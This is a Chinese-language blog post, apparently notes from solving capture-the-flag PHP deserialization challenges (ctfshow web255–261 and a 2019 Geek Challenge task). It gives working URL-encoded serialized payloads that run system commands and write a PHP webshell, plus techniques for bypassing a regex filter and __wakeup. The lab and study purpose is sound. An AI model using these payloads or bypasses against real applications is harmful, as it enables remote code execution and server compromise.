反序列化刷题
web255
将isvip改为true然后序列化 echo urlencode($v=serialize($f=new ctfShowUser()));
Cookie:O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
username=xxxxxx&password=xxxxxxx
web256
序列化:echo urlencode($v=serialize(new ctfShowUser()));
将isvip改为true、代码内的username改为与password不同的值进行序列化,然后通过cookie传值
传参时候username与代码内的username相同、password与代码内的password相同
web257
通过初始化触发__construct()来修改code的值,通过修改为class='backDoor'进而通过__destruct()来触发backDoor方法,进行命令执行;
序列化:echo urlencode($v=serialize(new ctfShowUser()));
Cookie:user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22tac+f%2A%22%29%3B%22%3B%7D%7D
web258
与上一题相比增加了正则过滤,过滤掉了O:或者C:后面的任何数字,例如O:8,则会被过滤
preg_match('/[oc]:\d+:/i', $_COOKIE['user'])
可以通过在数字前面加上加号: O:+8
即可绕过
所以在上一题的基础上加上$a=str_replace('O:', 'O:+',$a)
添加上加号绕过;
web261
在php7.4之前是没__unserialize()和__serialize()方法;
在触发unserialize()函数时候会触发__unserialize()或者__wake(),在触发serialize()函数时候会触发__serialize()或者__sleep();
在php7.4或者更高版本中__unserialize和__wake()同时存在时会忽略__wake(),__serialize和__sleep()同时存在时会忽略__sleep();
__invoke可以构造rce,但是触发条件是:把啊对象当函数用;此时不满足
所以可以忽略掉__invoke、__sleep()、__wakeup()方法;
可以通过在创建ctfshowvip对象是传参到__construct($u,$p)对username和password进行赋值,在__unserialize中$code被赋值为877***可以绕过__destruct()中的弱等于,最后进行文件写入,最后访问877.php即可;
?vip=O%3A10%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A37%3A%22%3C%3Fphp+system%28%22cat+%2Fflag_is_here%22%29%3B%3F%3E%0A%22%3Bs%3A4%3A%22code%22%3BN%3B%7D
[极客大挑战 2019]PHP(__wakeup绕过)
扫描文件下载www.zip
在index.php中可以调用class.php,并且可以反序列化select参数
在class.php可以调用flag.php,此处要求$this->username === 'admin'、$this->password != 100,所以构造序列化传参是时候new Name('admin','100'),__wakeup会把username的值又变成guest,所以要绕过__wakeup;通过修改序列化后的此参数个数即可绕过;
然后传参给select即可获得flag
标签:__,3Bs%,22%,serialize,3A%,序列化,刷题 From: https://www.cnblogs.com/sunrise123/p/18367479